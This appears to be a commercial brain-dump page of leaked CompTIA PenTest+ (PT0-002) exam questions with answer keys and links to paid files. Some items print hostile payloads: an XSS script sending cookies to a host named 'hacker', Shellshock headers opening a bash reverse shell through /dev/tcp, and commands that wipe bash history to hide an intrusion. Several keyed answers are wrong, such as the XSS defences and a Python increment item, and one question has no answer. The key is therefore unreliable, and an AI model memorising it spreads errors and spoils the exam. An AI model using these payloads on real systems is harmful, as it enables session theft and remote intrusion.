Latest CompTIA PT0-002 First Attempt, Exam real Dumps Updated [Aug-2021]
Get the superior quality PT0-002 Dumps Questions from Fast2test. Nobody can stop you from getting to your dreams now. Your bright future is just a click away!
NEW QUESTION 29
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Session tokens
- B. Output encoding
- C. Web-application firewall
- D. Input validation
- E. Parameterized queries
- F. Base64 encoding
Answer: A,E
NEW QUESTION 30
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)
- A. The name of the person who found the flaw
- B. The CVSS score of the finding
- C. The client acceptance form
- D. The network location of the vulnerable device
- E. The vulnerability identifier
- F. The tool used to find the issue
Answer: E,F
NEW QUESTION 31
Which of the following is the MOST effective person to validate results from a penetration test?
- A. Client
- B. Third party
- C. Chief Information Officer
- D. Team leader
Answer: D
NEW QUESTION 32
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
- A. RFID cloning
- B. Tag nesting
- C. RFID tagging
- D. Meta tagging
Answer: D
NEW QUESTION 33
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
- A. Kismet
- B. Wifite
- C. Wireshark
- D. Aircrack-ng
Answer: D
NEW QUESTION 34
A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?
- A. Root user
- B. Local administrator
- C. Service
- D. Network administrator
Answer: C
NEW QUESTION 35
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
- A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
- B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
Answer: B
NEW QUESTION 36
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
- A. Attempt to flood open ports.
- B. Create an encrypted tunnel.
- C. Look for open ports.
- D. Listen for a reverse shell.
Answer: C
NEW QUESTION 37
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
- A. Wait for the next login and perform a downgrade attack on the server.
- B. Perform a brute-force attack over the server.
- C. Use an FTP exploit against the server.
- D. Capture traffic using Wireshark.
Answer: D
NEW QUESTION 38
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Answer:
Explanation:
NEW QUESTION 39
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A. Redirecting Bash history to /dev/null
- B. Covering tracks by clearing the Bash history
- C. Making a copy of the user's Bash history for further enumeration
- D. Making decoy files on the system to confuse incident responders
Answer: B
NEW QUESTION 40
Which of the following expressions in Python increase a variable val by one (Choose two.)
- A. val=val++
- B. val+=1
- C. ++val
- D. +val
- E. val++
- F. val=(val+1)
Answer: B,C
NEW QUESTION 41
A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?
- A. Immunity Debugger
- B. Drozer
- C. GDB
- D. OllyDbg
Answer: D
NEW QUESTION 42
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
- A. Mimikatz
- B. John the Ripper
- C. Hydra
- D. Cain and Abel
Answer: B
NEW QUESTION 43
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
- A. To provide feedback on the report structure and recommend improvements
- B. To ensure the penetration-testing team destroys all company data that was gathered during the test
- C. To determine any processes that failed to meet expectations during the assessment
- D. To discuss the findings and dispute any false positives
Answer: C
NEW QUESTION 44
......
CompTIA Practice Test Engine with PT0-002 Questions: https://drive.google.com/open?id=1yYim0zwUxcptKFWKdJvwTI0W-N5VsXH9
Guaranteed Success with Valid CompTIA PT0-002 Dumps: https://www.fast2test.com/PT0-002-premium-file.html